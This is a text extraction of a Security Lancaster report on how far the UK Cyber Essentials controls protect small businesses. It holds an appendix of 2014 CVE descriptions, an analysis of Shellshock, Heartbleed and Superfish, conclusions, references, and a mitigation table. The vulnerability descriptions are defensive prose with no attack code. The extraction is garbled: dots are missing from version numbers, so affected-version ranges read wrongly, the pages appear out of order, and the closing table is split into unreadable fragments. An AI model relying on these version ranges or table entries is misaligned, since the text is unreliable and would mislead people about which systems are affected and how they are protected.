CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
certificate which itself can be easily gatheredfrom any other machine running SuperFishand they have full access to any SSL-securedconnection from the target machine
Thankfully while the risks to users andSMEs was high the fix is a simple one-timerun of a removal tool provided by Lenovothemselves[11] and is mitigated fully throughthe Cyber Essentials patch managementadvice
Threat Analysis
ShellShock Without Cyber Essentials inplace SME 1 and 2 would be at risk fromlsquoShellshock as they both operate UnixLinuxbased systems that would require patching toplug the security issue The extent at whichSMEs 3 and 4 are vulnerable to this issue isunclear as their large dependency on outside
service providers leaves them in a positionwhere they are both unable to determine theirvulnerability and additionally unable to remedyit
With Cyber essentials SME 1 and 2 wouldbe fully protected and it is likely that SME3 and 4 are also protected if the externalproviders also use a Cyber Essentials or othersecurity and patching schemes
Heartbleed The lsquoHeartbleedrsquo bug is anothervulnerability that without Cyber Essentialsguidelines being followed would have laidcompanies external-facing services open tomalicious attackers
In all cases however each SME can befully protected with a combination of patchmanagement firewalling and application ofaccess controls from the Cyber Essentialsguidelines
SuperFish All of the SMEs we interviewedcould be exceedingly vulnerable to thelsquoSuperfishrsquo issue without Cyber Essentialsas much of their operations revolve aroundSSL encrypted communications A break inthe chain-of-trust for their certificates wouldallow an attacker to man-in-the-middle theircommunications
Normal system updates would have failedto remedy the situation as the fix providedby Lenovo consisted of a tool to be runin addition to the normal operating systempatches It is further debatable how effectiveCyber Essentials patch management wouldhave been in plugging this vulnerability as itwould require that the administrators be awareof the issue and know of the patch rather thansimply following lsquonormalrsquo patching guidelinesAssuming that the persons responsible for theequipment are aware of the issue howeverthen Cyber Essentials patch management fullymitigates this issue
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 11 of 28
ConclusionsT
he Cyber Essentials Security Tools havebeen shown to mitigate or to mitigateas soon as a patch is released all
vulnerabilities from remote attackers that donot exploit fundamentally insecure software orhardware Of the two-hundred vulnerabilitiescollected eight exploits were not able tobe resolved with the deployment of securitypatches for vulnerabilities such as these theonly mitigation available is simply not to installthe compromised systems To help preventdeployments being susceptible to attacks onfaulty systems it may be recommended that ablacklist of such items is composed for publicreference
Scope It is important to consider that thescope of this study covers only internet-basedcommodity-level attacks and although theCyber Essentials tools performs very well inmitigating this it does not represent fullsecurity There is an increasingly identifiedrisk from insiders that also requires attentionnot least malicious acts but also from usersunknowingly compromising security
The SMEs interviewed representorganisations from a range of market sectorsin web development and online presencespecialist scientific services the hospitalityindustry and finance
Additional Tools
The 10 Steps to Cyber Security[2] identifiesadditional security measures that supportthe Cyber Essentials Scheme well todeliver additional security through indirectmeasures such as User Education Awarenessalong with Network and Systems MonitoringThese additional measures would serve tobolster cyber security through fortifyingeach employee of the SME with necessaryknowledge on safe practice itrsquos importanceand some technical basic understanding -just as they may be versed in environmentalawareness Network and Systems Monitoringallows for remote user logins as well as fileaccess and activity to be logged For verysmall networks this may be currently infeasibleas the extra manpower or finances required for
such a system are costly However for largeorganisations additional monitoring capabilityshould be explored as a future extension tothe Cyber Essentials not just to identify andmitigate malicious action for more bespokeand sophisticated attacks than those reportedon but to also aid in providing evidence forany potential cyber-crime investigations
There exist some collective approaches toimproving cyber-security a notable example ofthis is The Cyber-security Information SharingPartnership (CiSP)[4] The partnership aimsto benefit all members by providing real-time updates on issues of cyber-securityand discovered vulnerabilities as well asbest-practice guides and other cyber-threatinformation It would be beneficial formore organisations to belong to cyber-securitycollectives like this creating networks ofinformed individuals working together to tacklecyber-crime This would be particularly usefulto quickly identify potential vulnerabilitiesand possible patches which as shown inthis report is critical for the CE patchmanagement security control to fully mitigaterelated vulnerabilities
An important note to be made is towardthe security of business affiliates and serviceproviders Even if an SME has CyberEssentials in place any use of cloud-servicesrelies on the vendorrsquos security controls forthreat mitigation In other words cloud-email accounting and any other cloud-basedor remote services are only as secure as theservice provider makes it In general cloud-providers should be holding a high level ofscrutiny to their security practice and shouldbe encouraged to certify their protectionHewlett-Packard(HP) has taken this furtherand has begun to strengthen itrsquos entire supply-chain ( 600 SMEs) with the Cyber Essentialsaccreditation This provides protection acrossthe entirety of Hewlett Packardrsquos operationsas well as itrsquos affiliates This should be agoal for organisations of all sizes minimisingthe risk from cyber-threats by ensuring alltrading partners uphold the same high levelsof security
Cyber Essentials Controls
Of the five current Cyber Essentials ControlsPatch Management was considered to aid inthe mitigation of the highest proportion ofremote attacks (875 ) counter-intuitivelythe Survey responses had patch managementranked last in use for SMEs The highestcurrently used controls could be seen asthose providing the most intuitive or easilyunderstood protection Data loss preventionstrong passwords and firewall While patchmanagement isnrsquot necessarily understood byindividuals as a tool to greatly improve cyber-security
Anti-Malware was useful in mitigating theleast (10 ) vulnerabilities It is howeverimportant to note that Anti-Malware is largelythe only security tool that may routinely scanthe network hardware and software as wellas any items downloaded from the internetor as email attachments This serves as alast line of defence and as such is vital to anorganisationrsquos cyber-safety
Recommendations
To further improve cyber-security across theUK we recommend that
1 Collective approaches to cyber securityshould be further encouraged Inparticular a governmentalcollectiveapproach to identifying inherently flawedproducts should be developed Thiscould be in addition to or as an extensionto current initiatives like CiSP whichcan make a difference in detecting andreacting on potential vulnerabilities in atimely manner
2 Further research into the mitigation ofother cyber-threats is carried out toexplore the risk from insider-threats andtargeted attacks
3 Further employee education is stronglyencouraged specially to be able totackle these other types of attacksmentioned above which were not underthe scope of this report
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 12 of 28
References[1] Centre for the Protection of
National Infrastructure CESGCabinet Office InnovationDepartment for Business andSkills Cyber security guidance forbusiness httpswwwgovuk
governmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[2] Centre for the Protection ofNational Infrastructure CESGCabinet Office and Innovation amp SkillsDepartment for Business 10 stepsto cyber security httpswwwgov
ukgovernmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[3] Innovation CESG UK Trade ampInvestment Prime Ministerrsquos Office10 Downing Street Centre for theProtection of National InfrastructureGovernment CommunicationsHeadquaters UK Trade amp Departmentfor Business and Skills Cyber securityboost for uk firms httpswww
govukgovernmentnewscyber-
security-boost-for-uk-firmsJanuary 2015
[4] Centre for the Protection ofNational Infrastructure CiSPCERT-UK and Innovation amp SkillsDepartment for Business Cyber-securityinformation sharing partnership (cisp)httpswwwcertgovukcispMarch 2013
[5] CREST Cyber essentialscertified companies http
wwwcyberessentialsorglistMarch 2015
[6] CVEMitreorg Terminology - mitreorghttpcvemitreorgabout
terminologyhtml
[7] Cyber Essentials Cyber essentialsscheme - overview httpswwwgov
ukgovernmentpublicationscyber-
essentials-scheme-overview
[8] CESG Cabinet Office Centre for theProtection of National InfrastructureDepartment for Business Innovationamp Skills Common cyber attacksReducing the impact https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400106Common_Cyber_Attacks-
Reducing_The_Impactpdf January2015
[9] UK Cyber Security Forum Northwest cyber security clusterhttpwwwukcybersecurityforum
comindexphpcyber-security-
clustersnorth-west-lsquo-cluster2015
[10] HM Government Cyber essentialscertified companies https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400914bis-15-72-cyber-
essentials-scheme-assurance-
frameworkpdf January 2015
[11] Lenovo Superfish uninstall instructionshttpsupportlenovocomus
enproduct_securitysuperfish_
uninstall
[12] Mitreorg Cve-2014-0160 akaheartbleed httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-0160 2014
[13] Mitreorg Cve-2014-6271 akashellshock httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-6271 2014
[14] Mitreorg Cve-2015-2077 aka superfishhttpcvemitreorgcgi-bin
cvenamecginame=CVE-2015-20772015
[15] Netcraft Half a million widely trustedwebsites vulnerable to heartbleedbug httpnewsnetcraftcom
archives20140408half-a-
million-widely-trusted-websites-
vulnerable-to-heartbleed-
bughtml April 2014
[16] Cabinet Office The uk cyber securitystrategy - protecting and promotingthe uk in a digital world https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file60961uk-cyber-security-
strategy-finalpdf November 2011
[17] Cabinet Office and The Rt HonFrancis Maude MP Governmentmandates new cyber security standardfor suppliers httpswwwgov
ukgovernmentnewsgovernment-
mandates-new-cyber-security-
standard-for-suppliers September2014
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 13 of 28
Cyb
erC
ontr
ols
App
licab
ility
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-0
00
8y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(U
ser
Po
licy)
A
nti
-Mal
war
eC
VE
-20
13
-00
22
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-00
84
yy
yn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-0
14
0y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
14
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-01
72
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-U
ser
Acc
ess
(Str
on
gP
assw
ord
)P
atch
Man
agem
ent
CV
E-2
01
3-0
17
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-01
99
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-02
53
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Ser
ver)
CV
E-2
01
3-0
27
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
48
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
59
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
61
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
63
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-0
64
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Pat
chM
anag
emen
tC
VE
-20
13
-07
46
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-07
53
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-07
87
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
90
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
03
5y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-1
10
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-11
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-1
14
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
15
3y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
18
1n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-13
03
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-13
84
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
CV
E-2
01
3-1
38
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
45
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-1
47
2y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Acc
ess
Po
licy)
CV
E-2
01
3-1
55
3y
ny
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
62
0y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
62
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
63
8y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
66
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
67
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
70
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
13
-17
34
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-17
77
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-23
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
C
VE
-20
13
-23
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 14 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-2
35
0n
yn
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-2
49
2y
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
